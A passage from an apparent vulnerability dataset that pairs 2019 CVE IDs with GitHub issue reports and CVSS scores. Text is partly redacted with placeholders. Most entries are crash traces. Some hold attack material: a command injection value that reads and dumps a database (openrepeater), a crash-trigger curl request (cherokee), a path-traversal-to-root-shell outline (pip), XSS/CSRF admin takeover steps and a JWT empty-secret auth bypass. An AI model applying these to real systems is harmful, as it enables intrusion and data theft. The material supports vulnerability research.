        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20629",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1264",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1264",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-05T22:57:04Z",
        "description": "SEGV (heap buffer overflow) on gf_m2ts_process_pmt. Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master) due to a heap buffer overflow on function gf_m2ts_process_pmt. APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG add at pc NUMBERTAG a6 bp NUMBERTAG ffd NUMBERTAG f NUMBERTAG c0 sp NUMBERTAG ffd NUMBERTAG f NUMBERTAG b0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG add thread T NUMBERTAG a5 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f2f NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20630",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1268",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1268",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-06T00:10:13Z",
        "description": "heap buffer overflow on APITAG Hi, Our fuzzer found a buffer overflow on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG a NUMBERTAG at pc NUMBERTAG c2aa bp NUMBERTAG ffded NUMBERTAG d0 sp NUMBERTAG ffded NUMBERTAG c0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG a NUMBERTAG thread T NUMBERTAG c2a9 in APITAG PATHTAG NUMBERTAG c2a9 in gf_bs_read_bit PATHTAG NUMBERTAG ecc7 in gf_bs_read_double PATHTAG NUMBERTAG d in gf_odf_read_mediatime PATHTAG NUMBERTAG bb in gf_odf_parse_descriptor PATHTAG NUMBERTAG b NUMBERTAG in gf_odf_read_iod PATHTAG NUMBERTAG bb in gf_odf_parse_descriptor PATHTAG NUMBERTAG b0 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG fe2e NUMBERTAG fa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20631",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1270",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1270",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-06T00:11:01Z",
        "description": "SEGV on unknown address on gf_list_count. Hi, Our fuzzer found an UAF on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG fff NUMBERTAG pc NUMBERTAG a NUMBERTAG d bp NUMBERTAG bfa0 sp NUMBERTAG ffe5b NUMBERTAG b0 T NUMBERTAG a NUMBERTAG c in gf_list_count PATHTAG NUMBERTAG d4 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG ff NUMBERTAG fe NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20632",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1271",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1271",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-07-06T00:25:31Z",
        "description": "SEGV on unknown addres on gf_odf_delete_descriptor. Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG diso APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG ff NUMBERTAG pc NUMBERTAG c3ef6d bp NUMBERTAG bfa0 sp NUMBERTAG fffe NUMBERTAG bf NUMBERTAG T NUMBERTAG c3ef6c in gf_odf_delete_descriptor PATHTAG NUMBERTAG f NUMBERTAG in gf_odf_del_esd PATHTAG NUMBERTAG a2e in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f NUMBERTAG de NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20789",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/940",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/940",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2019-11-27T14:35:29Z",
        "description": "Croogo NUMBERTAG Cms Has Multiple Stored XSS Vulnerabilities. URL\uff1a URLTAG Payload: APITAG parameter\uff1atitle FILETAG FILETAG URL: URLTAG Payload: APITAG parameter:title FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20798",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1227",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1227",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2019-07-25T14:44:52Z",
        "description": "Reflected XSS in About page. Requested URL is improperly displayed on the About page. The problem occurs on default configuration in Cherokee and Cheroke administrator panel. XSS in administrator panel can be used to reconfigure the server and execute arbitrary commands. APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.4,
        "impactScore": 6.0,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-20799",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1221",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1221",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2019-07-25T14:31:07Z",
        "description": "remote null pointer dereference trigger in admin handler. It's possible to trigger NULL pointer dereference in case if request uses POST method with empty body. cherokee/handler_admin.c ERRORTAG If post body is empty then post.buf is NULL and strchr on tmp results in NULL pointer dereference. Proof of concept: curl d \"\" URLTAG test NUMBERTAG is the admin handler. ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20799",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1222",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1222",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2019-07-25T14:34:23Z",
        "description": "escape_with_table invalid access. cherokee/buffer.c: CODETAG in the line NUMBERTAG s is used to index is_char_escaped table. Because s is signed then we can get (negative value NUMBERTAG which results in negative value, so we access memory _before_ is_char_escaped. Simple APITAG to reproduce APITAG test8 is a handler for proxy module Patch for this issue: diff git PATHTAG PATHTAG index APITAG NUMBERTAG PATHTAG +++ PATHTAG APITAG NUMBERTAG APITAG escape_with_table (cherokee_buffer_t buffer, uint NUMBERTAG t is_char_escaped) { char t; const char s, s_next; char end; + const unsigned char s, s_next; + unsigned char end; cuint_t n_escape NUMBERTAG static char APITAG NUMBERTAG abcdef\";",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20799",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1225",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1225",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2019-07-25T14:41:51Z",
        "description": "heap buffer overflow in handler cgi. APITAG ERRORTAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20799",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1226",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1226",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2019-07-25T14:44:01Z",
        "description": "incorrectly used ip NUMBERTAG in proxy connection. A socket structure is incorrectly used as ip NUMBERTAG while connecting to a proxy server. APITAG APITAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20800",
        "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1224",
        "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1224",
        "Repo_new": "cherokee/webserver",
        "Issue_Created_At": "2019-07-25T14:37:07Z",
        "description": "CGI Handler too many headers. struct cherokee_handler_cgi_t (handler_cgi.h) consist of a fixed sized array (char envp[ENV_VAR_NUM]) for environ variables. Sending a request with a lot of headers, causes to increment int envp_last to a value greater than ENV_VAR_NUM resulting in reading outside the array. handler_cgi.c: APITAG APITAG CODETAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20804",
        "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/57",
        "Issue_Url_new": "https://github.com/gilacms/gila/issues/57",
        "Repo_new": "gilacms/gila",
        "Issue_Created_At": "2019-10-29T16:48:33Z",
        "description": "XSS + CSRF Admin account takeover. Title Persistence XSS at \" URLTAG \" Description A number of factors lead to an attack that could compromise an admin user account. The following steps describe how to achieve it. First, the functionality in question is vulnerable to XSS attacks in the field responsible for changing the page header. Due to the fact that this feature does not have any anti CSRF token ( URLTAG an attack using an auto submit form containing XSS is feasible. thema in question .. as aggravating none of the admin user session tokens, they are protected with the HTTP only flag, ie they can be caught via scripting languages. POC The following two demos illustrate respectively, direct insertion via functionality, and shortly after a proof of concept using an attacker's domain site and the victim (in this case the admin) by clicking on the form containing the same request to fire and persist a XSS on your blog homepage FILETAG Attack POC FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20805",
        "Issue_Url_old": "https://github.com/upx/upx/issues/317",
        "Issue_Url_new": "https://github.com/upx/upx/issues/317",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2019-11-21T09:32:01Z",
        "description": "upx devel ddos Vulnerability. ubuntu NUMBERTAG PATHTAG ddos NUMBERTAG attachment APITAG APITAG unsigned const nbucket = get_te NUMBERTAG hashtab FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-20894",
        "Issue_Url_old": "https://github.com/containous/traefik/issues/5312",
        "Issue_Url_new": "https://github.com/traefik/traefik/issues/5312",
        "Repo_new": "traefik/traefik",
        "Issue_Created_At": "2019-09-06T13:32:38Z",
        "description": "Mutual TLS verification skipped for established connection. Do you want to request a feature or report a bug ? Bug Did you try using a NUMBERTAG configuration for the version NUMBERTAG Yes [x] No What did you do? APITAG good illustration URLTAG of very related problem. I have NUMBERTAG ingress routes with APITAG provider. First service expected to have ordinary LE and https. Second service expected to be served only with mutual TLS (mtls) My k8s definitions: yaml APITAG extensions NUMBERTAG kind: Deployment metadata: name: meow spec: replicas NUMBERTAG selector: APITAG app: meow template: metadata: labels: app: meow spec: containers: name: meow image: PATHTAG ports: APITAG NUMBERTAG APITAG NUMBERTAG kind: Service metadata: name: meow svc spec: ports: port NUMBERTAG APITAG NUMBERTAG protocol: TCP name: http selector: app: meow APITAG APITAG kind: APITAG metadata: name: meow svc https spec: APITAG https routes: match: Host( APITAG ) kind: Rule services: name: meow svc port NUMBERTAG middlewares: name: test header name: passtlsclientcert tls: options: name: tls with client verification APITAG APITAG kind: APITAG metadata: name: meow svc https spec: APITAG https routes: match: Host( APITAG ) kind: Rule services: name: meow svc port NUMBERTAG middlewares: name: test header name: passtlsclientcert doesn't require TLS tls: {} APITAG APITAG kind: APITAG metadata: name: tls with client verification labels: app: traefik chart: traefik NUMBERTAG release: \"traefik\" heritage: APITAG spec: APITAG APITAG APITAG [ APITAG APITAG APITAG APITAG APITAG APITAG APITAG ] APITAG true APITAG APITAG my tls secret APITAG APITAG APITAG APITAG kind: Middleware metadata: name: passtlsclientcert spec: APITAG pem: true APITAG APITAG kind: Middleware metadata: name: test header spec: headers: APITAG X Script Name: \"added by APITAG APITAG X Custom Response Header: \"added by APITAG Testing NUMBERTAG ERRORTAG Testing NUMBERTAG I open my first service APITAG (that does not require certs) in my chrome browser and after that, I open second APITAG (that requires certs). Same behaviour with APITAG What did you expect to see? Test case NUMBERTAG ERRORTAG is Ok. Test case NUMBERTAG browser should show me ERR_BAD_SSL_CLIENT_AUTH_CERT error. Like it does in incognito for the same web page. What did you see instead? Test case NUMBERTAG ERRORTAG is Ok. Test case NUMBERTAG browser shows me page without ERR_BAD_SSL_CLIENT_AUTH_CERT error. With headers. There is not header APITAG with client certificate. Output of traefik version : APITAG version of Traefik are you using?_) CODETAG What is your environment & configuration (arguments, toml, provider, platform, ...)? CODETAG If applicable, please paste the log output in DEBUG level ( APITAG switch) ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20909",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/178",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/178",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2019-12-31T06:04:23Z",
        "description": "Several bugs need to be fixed.. Hi, I got some bugs, and I tested on master branch and version NUMBERTAG There are NUMBERTAG heap overflow NUMBERTAG NULL pointer deference NUMBERTAG denial of service NUMBERTAG stack overflow (this bug causes memory leak in master branch) in that. Compile with ASAN and use degrewrite to repro that. Hear are some details:",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20916",
        "Issue_Url_old": "https://github.com/pypa/pip/issues/6413",
        "Issue_Url_new": "https://github.com/pypa/pip/issues/6413",
        "Repo_new": "pypa/pip",
        "Issue_Created_At": "2019-04-16T17:23:55Z",
        "description": "pip install APITAG allow directory traversal, leading to arbitrary file write. Environment pip version: pip NUMBERTAG Python version: Python NUMBERTAG Python NUMBERTAG OS: Ubuntu NUMBERTAG Windows NUMBERTAG Description This is a security vulnerability. when installing a remote package via a specified URL \"pip install \\ APITAG \", A malicious server (or a network APITAG if downloading over HTTP) can send a Content Disposition header with filename which contains \"../\", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution. issue occurs in _download_http_url in PATHTAG poc: for linux, pip usually requires root privileges, we can write following files to get root shell: PATHTAG /etc/crontab for windows, we can write a batch file to the user startup dir, lead to command execution on next boot: PATHTAG PATHTAG for malicious header: CODETAG pip install malicious url result: ERRORTAG similar issue: CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-20921",
        "Issue_Url_old": "https://github.com/snapappointments/bootstrap-select/issues/2199",
        "Issue_Url_new": "https://github.com/snapappointments/bootstrap-select/issues/2199",
        "Repo_new": "snapappointments/bootstrap-select",
        "Issue_Created_At": "2019-02-14T11:10:30Z",
        "description": "Escaped tags parsed as non escaped in title and data content. The bootstrap select does not respect escaped content correctly. Instead the escaped content is rendered as it would not be escaped. Sample can be seen here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-20933",
        "Issue_Url_old": "https://github.com/influxdata/influxdb/issues/12927",
        "Issue_Url_new": "https://github.com/influxdata/influxdb/issues/12927",
        "Repo_new": "influxdata/influxdb",
        "Issue_Created_At": "2019-03-27T12:46:27Z",
        "description": "Password bypass vulnerability. We can authorize by any user. For that we can use jwt token with empty shared_secret. It's happen because URLTAG hear we not check that APITAG is not empty string. In Authentication and authorization in APITAG document we not mention anything about APITAG variable. Also sems like we also not check exp state of token. And once generated token valid forewer.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-25010",
        "Issue_Url_old": "https://github.com/rust-lang-nursery/failure/issues/336",
        "Issue_Url_new": "https://github.com/rust-lang-deprecated/failure/issues/336",
        "Repo_new": "rust-lang-deprecated/failure",
        "Issue_Created_At": "2019-11-13T21:37:22Z",
        "description": "Memory safe violation by abusing APITAG . I noticed that it is possible to cause type confusion in downcast by manually implementing APITAG . URLTAG Although the name of the function clearly shows that it is a private API, I believe a safe Rust program should not violate the memory safety guaranteed by Rust type system.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-25011",
        "Issue_Url_old": "https://github.com/netbox-community/netbox/issues/3471",
        "Issue_Url_new": "https://github.com/netbox-community/netbox/issues/3471",
        "Repo_new": "netbox-community/netbox",
        "Issue_Created_At": "2019-08-31T09:47:44Z",
        "description": "FILETAG a cve will be requested URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-25016",
        "Issue_Url_old": "https://github.com/Duncaen/OpenDoas/issues/45",
        "Issue_Url_new": "https://github.com/duncaen/opendoas/issues/45",
        "Repo_new": "duncaen/opendoas",
        "Issue_Created_At": "2021-01-28T16:09:13Z",
        "description": "APITAG keeps current PATH variable . APITAG version NUMBERTAG System: Gentoo, Debian NUMBERTAG APITAG content: APITAG _mad doas_ says that variable PATH is set to value appropriate for the target user, but current value preserves: CODETAG expected value: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-25024",
        "Issue_Url_old": "https://github.com/OpenRepeater/openrepeater/issues/66",
        "Issue_Url_new": "https://github.com/openrepeater/openrepeater/issues/66",
        "Repo_new": "openrepeater/openrepeater",
        "Issue_Created_At": "2019-03-06T21:08:00Z",
        "description": "Unauthenticated Command Injection Flaw. An unauthenticated malicious actor can execute arbitrary system commands via APITAG This has a critical impact in the security of the system, for example Download system database: > $ curl PATHTAG data \"post_service=;cat PATHTAG > openrepeater.db The only limit is imagination. Regards!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-25043",
        "Issue_Url_old": "https://github.com/SpiderLabs/ModSecurity/issues/2566",
        "Issue_Url_new": "https://github.com/spiderlabs/modsecurity/issues/2566",
        "Repo_new": "spiderlabs/modsecurity",
        "Issue_Created_At": "2021-05-06T03:01:20Z",
        "description": "Certain HTTP request cause APITAG to throw \"string out of index\" error. Describe the bug The connection will be closed due to a \"string index out of range\" error under certain request. Logs and dumps CODETAG To Reproduce APITAG Server: APITAG NUMBERTAG on Ngin NUMBERTAG official base image",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-25047",
        "Issue_Url_old": "https://github.com/greenbone/gsa/issues/1601",
        "Issue_Url_new": "https://github.com/greenbone/gsa/issues/1601",
        "Repo_new": "greenbone/gsa",
        "Issue_Created_At": "2019-09-02T13:48:06Z",
        "description": "Reflected XSS in GSA possible.. Expected behavior Escaping part of URL and redirecting to /login page. Actual behavior When clicking on a specially crafted URL, APITAG Code gets executed. Steps to reproduce FILETAG GVM versions gsa NUMBERTAG gvm NUMBERTAG openvas scanner NUMBERTAG gvm libs: Environment Operating system: found with nikto NUMBERTAG erified with Firefox Quantum NUMBERTAG esr NUMBERTAG Bit) Installation method / source: (packages, source installation) Logfiles APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-25056",
        "Issue_Url_old": "https://github.com/bromite/bromite/issues/2",
        "Issue_Url_new": "https://github.com/bromite/bromite/issues/2",
        "Repo_new": "bromite/bromite",
        "Issue_Created_At": "2017-10-11T14:19:01Z",
        "description": "Support download of filters from adblock servers. This issue composes of multiple parts: a new tab to manage the adblocking feature logic to download the adblock filters and store them logic to parse the adblock filters The project we could look at are APITAG and APITAG origin.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-25058",
        "Issue_Url_old": "https://github.com/USBGuard/usbguard/issues/273",
        "Issue_Url_new": "https://github.com/usbguard/usbguard/issues/273",
        "Repo_new": "usbguard/usbguard",
        "Issue_Created_At": "2019-02-07T12:11:36Z",
        "description": "No default ACL on some dbus methods. Some of the methods exposed via dbus are not covered by the current default policy URLTAG . This includes the APITAG and APITAG methods. On a default debian install, as unprivileged user: ERRORTAG This can be fixed by adding these to the current policy configuration. However, having NUMBERTAG buses and NUMBERTAG ACLs makes the administration of any deployment tedious. There is always a risk of future methods to be exposed. Ideally, dbus should be the only bus exposed and the libqb bus dropped.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-25058",
        "Issue_Url_old": "https://github.com/USBGuard/usbguard/issues/403",
        "Issue_Url_new": "https://github.com/usbguard/usbguard/issues/403",
        "Repo_new": "usbguard/usbguard",
        "Issue_Created_At": "2020-08-07T17:54:42Z",
        "description": "Polkit policy is not valid with newest versions of Polkit. With new versions of Polkit, the value APITAG is no more valid for the tags APITAG , APITAG and APITAG . The [usbguard policy config]( URLTAG is not parsed anymore by new versions of Polkit, and the defined actions are unavailable. proposed solutions APITAG : allowed executing an action after authenticating, and the redo the action without auth for all the rest of the session. It is now unavailable APITAG : the authorization is kept for a brief period (e.g. five minutes). It is most probably not retro compatible. (I found no reference online of APITAG on pages mentioning APITAG ) APITAG : You have to re authenticate at each call of the action. This argument is retro compatible. Should we replace occurrences of APITAG with APITAG or APITAG ?",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-25070",
        "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/683",
        "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/683",
        "Repo_new": "wolfcms/wolfcms",
        "Issue_Created_At": "2019-04-01T06:25:24Z",
        "description": "Cross Site Scripting | APITAG NUMBERTAG User Add. Hello Team, I would like to report a vulnerability (cross site scripting) which I have observed in current version NUMBERTAG Cross Site Scripting (XSS) allows attacker to inject the malicious APITAG as user input and then malicious script can access any cookies, session tokens, or other sensitive information associated with impacted applications. Please refer URLTAG for more details. Impacted URL is URLTAG Steps to reproduce NUMBERTAG Browse to URLTAG to add an user NUMBERTAG Insert payload (malicious APITAG APITAG in Name text box and an invalid input in Username text box. APITAG NUMBERTAG Application is displaying error APITAG and returning the previous APITAG payload in response and hence executing it. APITAG Best Regards, URLTAG varchashva [at] gmail [dot] com",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-3494",
        "Issue_Url_old": "https://github.com/Paroxyste/Simply-Blog/issues/1",
